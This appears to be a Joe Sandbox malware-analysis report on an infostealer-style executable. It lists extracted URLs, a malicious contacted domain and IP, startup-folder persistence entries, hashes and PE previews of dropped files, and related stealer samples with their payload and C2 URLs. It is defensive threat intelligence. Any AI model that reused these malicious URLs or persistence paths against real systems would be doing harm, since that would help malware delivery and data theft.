                                      http://crl.thawte.com/ThawteTimestampingCA.crl0TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        http://lsoft.net/act/activate.aspx?ID=%11slotReadyRead()2readyRead()1slotError(QNetworkReply::NetworActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpfalse
                                          high
                                          http://www.softwareok.deActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            http://www.softwareok.de/?Freeware/Find.Same.Images.OK/Historycmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpfalse
                                              high
                                              http://www.softwareok.com/?Download=Find.Same.Images.OKcmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpfalse
                                                high
                                                https://sirnisirlo.online:443/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAUploadAlt_Ti.exe, 0000000F.00000003.1784459699.0000000000585000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://lsoft.net/act/activate.aspx?ID=%1Error1slotReadyRead()Error2readyRead()1slotError(QNetworkRepActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.phreedom.org/md5)TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360603475.00007FFB0BDDA000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmpfalse
                                                  high
                                                  https://sectigo.com/CPS0ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.aiim.org/pdfa/ns/id/TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1361209065.00007FFB0C1E8000.00000002.00000001.01000000.00000008.sdmp, ActiveISO.exe, 0000000A.00000002.1429841224.00007FFB0A168000.00000002.00000001.01000000.00000014.sdmpfalse
                                                      high
                                                      http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31LatestVersion(QString)2LatestVersion(QStrinActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31DownloadInfo(QString)2DownloadInfo(QString)ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.softwareok.de/?Download=Find.Same.Images.OKcmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpfalse
                                                        high
                                                        http://ocsp.thawte.com0TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://lsoft.net/act/activate.aspx?ID=%1ActiveISO.exe, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.vmware.com/0/ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpfalse
                                                                high
                                                                http://www.???.xx/?search=%sActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.symauth.com/cps0(ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.color.org)TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1361209065.00007FFB0C1E8000.00000002.00000001.01000000.00000008.sdmp, ActiveISO.exe, 0000000A.00000002.1429841224.00007FFB0A168000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                      high
                                                                      https://sirnisirlo.online/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zUploadAlt_Ti.exe, 0000000F.00000003.1784459699.0000000000585000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.ntfs.com/iso_file_manager.htmActiveISO.exe, 0000000A.00000002.1428048059.00007FF6B2023000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://bugreports.qt.io/_q_receiveReplyMicrosoft-IIS/4.Microsoft-IIS/5.Netscape-Enterprise/3.WebLogiTVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360603475.00007FFB0BDDA000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                        high
                                                                        http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.thawte.com/cps0/TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.symauth.com/rpa00ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.lsoft.net/act/WeActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.thawte.com/repository0WTVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.lsoft.net/act/ActiveISO.exe, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.info-zip.org/ActiveISO.exe, 00000008.00000002.1338281133.000001AD623EA000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE4EC000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000004FEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%3ActiveISO.exe, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://support.mozilla.orgUploadAlt_Ti.exe, 0000000F.00000002.1970127366.0000000007F18000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.surfok.de/UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.softwareok.comActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        188.114.97.3
                                                                                        sirnisirlo.onlineEuropean Union
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1556011
                                                                                        Start date and time:2024-11-14 19:55:08 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 9m 54s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:28
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:1
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:TVr2Z822J3.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:abe7cc92554b2defc6c336d5cafabe798f1f6c75076ccce897d6337fdbc42fd5.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.spyw.expl.evad.winEXE@20/31@1/1
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 33.3%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 88%
                                                                                        • Number of executed functions: 39
                                                                                        • Number of non-executed functions: 275
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, consent.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target ActiveISO.exe, PID 1792 because there are no executed function
                                                                                        • Execution Graph export aborted for target ActiveISO.exe, PID 5876 because there are no executed function
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: TVr2Z822J3.exe
                                                                                        TimeTypeDescription
                                                                                        15:55:48API Interceptor1x Sleep call for process: cmd.exe modified
                                                                                        15:55:50API Interceptor15x Sleep call for process: UploadAlt_Ti.exe modified
                                                                                        21:55:35AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT5884.tmp
                                                                                        21:55:49AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fmDaemonhfr.lnk
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        188.114.97.3View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htmGet hashmaliciousUnknownBrowse
                                                                                        • f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
                                                                                        SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                        • paste.ee/d/YU1NN
                                                                                        TT copy.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.lnnn.fun/u5w9/
                                                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • filetransfer.io/data-package/iiEh1iM3/download
                                                                                        Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • paste.ee/d/dc8Ru
                                                                                        Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • paste.ee/d/LOToW
                                                                                        8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • qegyhig.com/login.php
                                                                                        7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • lysyvan.com/login.php
                                                                                        UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • lysyvan.com/login.php
                                                                                        1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • lysyvan.com/login.php
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        sirnisirlo.onlineRechnung_2024_0091.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.96.3
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSchelentano.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                        • 172.67.74.152
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 104.21.80.55
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.71.28
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.71.28
                                                                                        file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                        • 172.67.174.133
                                                                                        http://loop.net.pk/cos.htmlGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                        • 104.17.25.14
                                                                                        https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/graylinelaketahoe.com&c=E,1,BWhR2At2OZAdw2Kzdn7d-U-fLZRdgzpdTFbcA87JOQxek-SzsLBqKBG-KMVpA5JovWFRbO4mN3q2zPe1YDaTOG57b4G9v05-IgsJXqrG4om_58_65Os9ldlZ&typo=1Get hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        Unit 2_week 4 2024.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.25.144.42
                                                                                        http://samobile.net/content/offsite_article.html?url=https%3A%2F%2Fsepedatua.com%2F158983%2Fsecure-redirect%23cnichols%2Bderickdermatology.com&headline=New+Jerusalem%2C+The+by+Chesterton%2C+G.+KGet hashmaliciousCaptcha PhishBrowse
                                                                                        • 104.26.5.39
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.55
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        Nexol.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        Loader.exe.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                        • 188.114.97.3
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Users\user\ActiveISO.exeRechnung_2024_0091.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exefile.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                      9nobq4rqr0.exeGet hashmaliciousUnknownBrowse
                                                                                                        KClGcCpDAP.exeGet hashmaliciousUnknownBrowse
                                                                                                          KClGcCpDAP.exeGet hashmaliciousUnknownBrowse
                                                                                                            46L03o2EOY.exeGet hashmaliciousUnknownBrowse
                                                                                                              46L03o2EOY.exeGet hashmaliciousUnknownBrowse
                                                                                                                Process:C:\Users\user\Desktop\TVr2Z822J3.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1266616
                                                                                                                Entropy (8bit):6.275567294044985
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:RWiPQmboElHjsxc93LwnfXlP0CT7T4ir7XFXTqlj02F:5Qrat3knTvT4yDpqlj/F
                                                                                                                MD5:B84DFABE933D1160F624693D94779CE5
                                                                                                                SHA1:AC0133C09708FE4A3C626E3BA4CDF44D3A0E065F
                                                                                                                SHA-256:588CB61B36A001384A2833BD5DF8D7982CA79D6AE17A3D83A94E01B1E79684BD
                                                                                                                SHA-512:EEAEEF8D6B5FA02DEDF9818BABAA4B5FFDB87300521883AA290289DCC720B3D543279085ED3FC649B74654143E678502E56EB3F92C4BAF53C075977DE33C1B0E
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: Rechnung_2024_0091.pdf.lnk, Detection: malicious, Browse
                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........s..G..CG..CG..C.n.CF..C.n.BX..C.n.BM..C.n.BC..C.n.BA..C.L.BF..C.L.BM..CSy.BO..CNjpCS..CG..Cu..C..(CD..C.L.BQ..C.L.BM..C.o.B`..C.o.CF..CG.tCF..C.o.BF..CRichG..C........................PE..d....~.e.........."....#.....<.................@.....................................y....`.............................................................8........>...(...+...`..................................(...@...@............0...)...........................text............................... ..`.rdata..0....0......................@..@.data....w.......L..................@....pdata...>.......@...D..............@..@.rsrc...8...........................@..@.reloc.......`......................@..B........................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
                                                                                                                File Type:data
                                                                                                                Category:modified
                                                                                                                Size (bytes):5744294
                                                                                                                Entropy (8bit):7.742273401416556
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:GEURJ067t6RrQDV4ApyS4qA8R+vVbFqj3raWqt9pueo9eO:p6J0SSrQZlATJ2SpxBO
                                                                                                                MD5:817AB233D4E9B8190644F5CE93D3B1F3
                                                                                                                SHA1:4E159A9A49039840B5C8C2419CB1ACCD5C52B927
                                                                                                                SHA-256:DB2608541949FCA83E986BA18E53B8DACB8896809B85BF8AE1C21DF409891282
                                                                                                                SHA-512:09FE7BC9942172973EAF155B9B637F673A47C949DF70F6C544E2129F788BE8B662987F112CD645D107C6873D130E4A79E0A24DBAE5FCB19A72092C86A42364AB
                                                                                                                Malicious:false
                                                                                                                Preview:.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................US.UW..HN.fl..rw.}m..cp.`b..4N.a_.{d..yp.`b..as..............................................{J.`j.}y.l.......................................................................................{@..uw.zp..z`......................................................................................CJ.]Q..Yj.{p.`-.@_.un.{q......................................................................&-..!3..#..........................................
                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):2364728
                                                                                                                Entropy (8bit):6.606009669324617
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                                MD5:967F4470627F823F4D7981E511C9824F
                                                                                                                SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                                SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                                SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                • Filename: 9nobq4rqr0.exe, Detection: malicious, Browse
                                                                                                                • Filename: KClGcCpDAP.exe, Detection: malicious, Browse
                                                                                                                • Filename: KClGcCpDAP.exe, Detection: malicious, Browse
                                                                                                                • Filename: 46L03o2EOY.exe, Detection: malicious, Browse
                                                                                                                • Filename: 46L03o2EOY.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
                                                                                                                File Type:data
                                                                                                                Category:modified
                                                                                                                Size (bytes):5744294
                                                                                                                Entropy (8bit):7.742273440207441
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:rEURJ067t6RrQDV4ApyS4qA8R+vVbFqj3raWqt9pueo9eO:Y6J0SSrQZlATJ2SpxBO
                                                                                                                MD5:6D09C41C5A46D61C070AECFC8A827C1F
                                                                                                                SHA1:931B6289B026403EF77F6F12DBFB011B8E75C449
                                                                                                                SHA-256:90B725A06252D8A0346C63C9745AEBC00100E6C177BA3D082E6DCAACB65B05A5
                                                                                                                SHA-512:3ECCFE6D2A1BA4CD35B52995C36D2F9CE95595F2018FEB90ABB71C835AF79E7164BF508038EBB2004C908C3D4E52D5CD64C2CE285797CD0BCA76E8E01CDDB4D9
                                                                                                                Malicious:false
                                                                                                                Preview:.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................US.UW..HN.fl..rw.}m..cp.`b..4N.a_.{d..yp.`b..as..............................................{J.`j.}y.l.......................................................................................{@..uw.zp..z`......................................................................................CJ.]Q..Yj.{p.`-.@_.un.{q......................................................................&-..!3..#..........................................
                                                                                                                Process:C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
                                                                                                                File Type:data
                                                                                                                Category:modified
                                                                                                                Size (bytes):5744294
                                                                                                                Entropy (8bit):7.742273463744664
                                                                                                                Encrypted:false
